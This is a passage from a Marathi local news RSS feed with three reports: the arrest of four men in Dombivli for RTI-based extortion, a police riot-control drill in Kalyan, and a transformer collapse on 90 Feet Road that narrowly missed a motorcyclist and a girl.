डोंबिवली: डोंबिवली एमआयडीसी परिसरातील नाले व गटार बांधकाम निकृष्ट दर्जाचे झाल्याप्रकरणी दाखल करण्यात आलेल्या माहिती अधिकार (RTI) अर्जाचा आधार घेत तब्बल १५ लाख रुपयांची खंडणी उकळण्याचा प्रयत्न करणाऱ्या चौघांच्या मुसक्या गुन्हे शाखा, घटक-०३, कल्याण यांनी आवळल्या. पेंढारकर कॉलेजजवळील बर्गर शॉपमध्ये खंडणीची रक्कम स्वीकारताना आरोपींना रंगेहात पकडण्यात आल्याने खळबळ उडाली आहे.

अटक करण्यात आलेल्या आरोपींची नावे दिपेश गौतम लोखंडे (३९), राहुल सुधाकर मुकादम (३०), विशाल गंगाराम जानकर (३१) आणि नरेश राजेंद्र सूर्यवंशी (२९) अशी आहेत. हे आरोपी MH-43-CM-0262 व MH-04-MN-7691 या वाहनांतून घटनास्थळी आले होते.

पोलिसांनी दिलेल्या माहितीनुसार, मे. अजवानी-मेटकॉन जॉईंट व्हेन्चर या कंपनीने एमआयडीसीतील नाले व गटाराचे बांधकाम निकृष्ट दर्जाचे केल्याबाबत कार्यकारी अभियंत्याकडे RTI अर्ज दाखल करण्यात आला होता. त्यानंतर हा अर्ज मागे घेण्यासाठी कंपनीच्या सुपरवायझरकडे वारंवार १५ लाख रुपयांची खंडणी मागितली जात असल्याची तक्रार गुन्हे शाखेकडे प्राप्त झाली. त्यानुसार पोलिसांनी नियोजनबद्ध सापळा रचत आरोपींना रंगेहात पकडले.

या प्रकरणी मानपाडा पोलीस ठाणे गुन्हा रजि. क्र. ५५५/२०२६ अन्वये बीएनएस कलम ३०८(२), ३०८(३) व ३०८(५) अंतर्गत गुन्हा दाखल करण्यात आला आहे. कारवाईदरम्यान १५ लाखांची रोख रक्कम, ५ मोबाईल फोन, दोन चारचाकी वाहने असा एकूण ₹२१,१०,५०० किमतीचा मुद्देमाल जप्त करण्यात आला. न्यायालयाने आरोपींना ५ दिवसांची पोलीस कोठडी सुनावली आहे.

ठाणे पोलीसांनी नागरिकांना आवाहन केले आहे की, या आरोपींनी इतर कोणाकडेही अशाच प्रकारे खंडणीची मागणी केली असल्यास त्यांनी पुढे येऊन तक्रार नोंदवावी.
ही धडाकेबाज कारवाई पोलीस आयुक्त आशुतोष डुंबरे, पोलीस सहआयुक्त (गुन्हे) पंजाबराव उगले, पोलीस उपआयुक्त (गुन्हे) अमरसिंह जाधव आणि सहाय्यक पोलीस आयुक्त (शोध-१) शेखर बागडे यांच्या मार्गदर्शनाखाली पार पडली.

कारवाईत वरिष्ठ पोलीस निरीक्षक अजित शिंदे, सपोनि बळवंत भराडे, सपोनि सर्जेराव पाटील, पोउनि एस. एम. तावडे, सपोउपनि बालाजी शिंदे, पोहवा सुधीर कदम, पोहवा सचिन कदम, पोलीस कॉन्स्टेबल गुरुनाथ जरग, सतीश सोनावणे, मिथुन राठोड आणि गोरक्ष शेकडे यांनी उल्लेखनीय कामगिरी बजावली.

The post RTI च्या आड खंडणीचा धंदा उघड! १५ लाखांची डील करताना चौकडी रंगेहात जेरबंद first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8847 0
कायदा-सुव्यवस्थेसाठी पोलिसांची तयारी पूर्ण; कल्याणात दंगा काबू सराव पार पडला https://crimeaala.com/?p=8838&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25be%25e0%25a4%25af%25e0%25a4%25a6%25e0%25a4%25be-%25e0%25a4%25b8%25e0%25a5%2581%25e0%25a4%25b5%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25b5%25e0%25a4%25b8%25e0%25a5%258d%25e0%25a4%25a5%25e0%25a5%2587%25e0%25a4%25b8%25e0%25a4%25be%25e0%25a4%25a0%25e0%25a5%2580-%25e0%25a4%25aa%25e0%25a5%258b%25e0%25a4%25b2 https://crimeaala.com/?p=8838#respond Thu, 25 Jun 2026 11:14:59 +0000 https://crimeaala.com/?p=8838 कल्याण : कायदा व सुव्यवस्था अबाधित राखण्यासाठी कल्याण पश्चिम येथील वासुदेव बळवंत फडके मैदान येथे गुरुवारी (दि. 25) सकाळी 11 ते दुपारी 2 वाजेपर्यंत दंगा काबू योजनेची रंगीत तालीम पार पडली. अपर पोलीस आयुक्त (पूर्व प्रादेशिक विभाग) संजय जाधव यांच्या आदेशानुसार आयोजित करण्यात आलेल्या या सरावात  पोलीस उप आयुक्त अतुल झेंडे,  सहाय्यक पोलीस आयुक्त अशोक [...]

The post कायदा-सुव्यवस्थेसाठी पोलिसांची तयारी पूर्ण; कल्याणात दंगा काबू सराव पार पडला first appeared on crimeaala.com.

]]>

कल्याण : कायदा व सुव्यवस्था अबाधित राखण्यासाठी कल्याण पश्चिम येथील वासुदेव बळवंत फडके मैदान येथे गुरुवारी (दि. 25) सकाळी 11 ते दुपारी 2 वाजेपर्यंत दंगा काबू योजनेची रंगीत तालीम पार पडली.

अपर पोलीस आयुक्त (पूर्व प्रादेशिक विभाग) संजय जाधव यांच्या आदेशानुसार आयोजित करण्यात आलेल्या या सरावात  पोलीस उप आयुक्त अतुल झेंडे,  सहाय्यक पोलीस आयुक्त अशोक होनमाने यांच्यासह परिमंडळ 3 मधील विविध पोलीस ठाण्यांचे अधिकारी व अंमलदार सहभागी झाले.

या रंगीत तालीमेत 22 पोलीस अधिकारी, 92 पोलीस अंमलदार, एसआरपीएफ प्लाटून, स्ट्रायकिंग फोर्स, सीआरएम मोबाईल, अग्निशमन दलाचे वाहन, रुग्णवाहिका तसेच अन्य यंत्रणांचा सहभाग होता. संभाव्य दंगली, जमाव नियंत्रण व आपत्कालीन परिस्थितीत तात्काळ प्रतिसाद देण्यासाठी पोलिसांची सज्जता तपासण्यात आली.

कायदा व सुव्यवस्था राखण्यासाठी कल्याण पोलिसांची सज्जता; दंगा काबू योजनेच्या रंगीत तालमीद्वारे ताकदीचे प्रदर्शन करण्यात आले.

The post कायदा-सुव्यवस्थेसाठी पोलिसांची तयारी पूर्ण; कल्याणात दंगा काबू सराव पार पडला first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8838 0
90 फूट रोडवर थरार! भररस्त्यावर ट्रान्सफॉर्मर कोसळला; बाईकस्वार व मुलगी थोडक्यात बचावले https://crimeaala.com/?p=8831&utm_source=rss&utm_medium=rss&utm_campaign=90-%25e0%25a4%25ab%25e0%25a5%2582%25e0%25a4%259f-%25e0%25a4%25b0%25e0%25a5%258b%25e0%25a4%25a1%25e0%25a4%25b5%25e0%25a4%25b0-%25e0%25a4%25a5%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25b0%25e0%25a4%25ad%25e0%25a4%25b0%25e0%25a4%25a6%25e0%25a4%25bf%25e0%25a4%25b5%25e0%25a4%25b8%25e0%25a4%25be-%25e0%25a4%259f%25e0%25a5%258d https://crimeaala.com/?p=8831#respond Tue, 23 Jun 2026 09:40:24 +0000 https://crimeaala.com/?p=8831 डोंबिवली:डोंबिवलीतील 90 फूट रोडवरील 90 फीट चहा वालासमोरील बाजूस असलेला विद्युत ट्रान्सफॉर्मर अचानक कोसळल्याने एक मोठी दुर्घटना थोडक्यात टळली. ट्रान्सफॉर्मर थेट एका दुचाकीवर कोसळल्याने दुचाकीस्वार व त्यांच्यासोबत असलेली मुलगी नशिबाने बचावल्याने संभाव्य जीवितहानी टळली यात गाडीचे नुकसान झाले. घटनेची माहिती मिळताच भाजप  कल्याण जिल्हा उपाध्यक्ष प्रदीप चौधरी, वाहतूक विभागाचे पोलीस निरीक्षक श्रीराम पाटील, केडीएमसीचे वॉर्ड [...]

The post 90 फूट रोडवर थरार! भररस्त्यावर ट्रान्सफॉर्मर कोसळला; बाईकस्वार व मुलगी थोडक्यात बचावले first appeared on crimeaala.com.

]]>

डोंबिवली:डोंबिवलीतील 90 फूट रोडवरील 90 फीट चहा वालासमोरील बाजूस असलेला विद्युत ट्रान्सफॉर्मर अचानक कोसळल्याने एक मोठी दुर्घटना थोडक्यात टळली. ट्रान्सफॉर्मर थेट एका दुचाकीवर कोसळल्याने दुचाकीस्वार व त्यांच्यासोबत असलेली मुलगी नशिबाने बचावल्याने संभाव्य जीवितहानी टळली यात गाडीचे नुकसान झाले.

घटनेची माहिती मिळताच भाजप  कल्याण जिल्हा उपाध्यक्ष प्रदीप चौधरी, वाहतूक विभागाचे पोलीस निरीक्षक श्रीराम पाटील, केडीएमसीचे वॉर्ड अधिकारी ठाकूर तसेच महावितरणचे अधिकारी घटनास्थळी दाखल झाले.

यावेळी प्रदीप चौधरी यांनी महावितरणच्या गलथान कारभारावर तीव्र नाराजी व्यक्त करत, “अशा प्रकारच्या घटना वारंवार घडत असून नागरिकांच्या जीवाशी खेळ सुरू आहे. महावितरणने तातडीने योग्य उपाययोजना करणे गरजेचे आहे,” असे स्पष्ट मत व्यक्त केले.


मात्र केडीएमसीचे वॉर्ड अधिकारी  ठाकूर आणि महावितरणचे अधिकारी यांनी प्रसारमाध्यमांसमोर बोलणे टाळल्याने अनेक प्रश्न अनुत्तरित राहिले आहेत.

या ट्रान्सफॉर्मरला महानगरपालिकेची परवानगी होती का? पडलेल्या ट्रान्सफॉर्मरची यापूर्वी कोणाकडून तक्रार करण्यात आली होती का? त्याची नियमित तपासणी झाली होती का? अशा अनेक प्रश्नांची उत्तरे अद्याप मिळालेली नाहीत.

जर या दुर्घटनेत त्या दोघांचा जीव गेला असता तर त्याची जबाबदारी कोण घेतली असती? असा संतप्त सवाल आता परिसरातील नागरिकांकडून उपस्थित केला जात आहे.
महावितरण आणि संबंधित यंत्रणांच्या निष्काळजीपणामुळे नागरिकांचा जीव धोक्यात येत असल्याचा आरोप होत असून या प्रकरणाची सखोल चौकशी करून दोषींवर कारवाई करण्याची मागणी जोर धरू लागली आहे.

The post 90 फूट रोडवर थरार! भररस्त्यावर ट्रान्सफॉर्मर कोसळला; बाईकस्वार व मुलगी थोडक्यात बचावले first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8831 0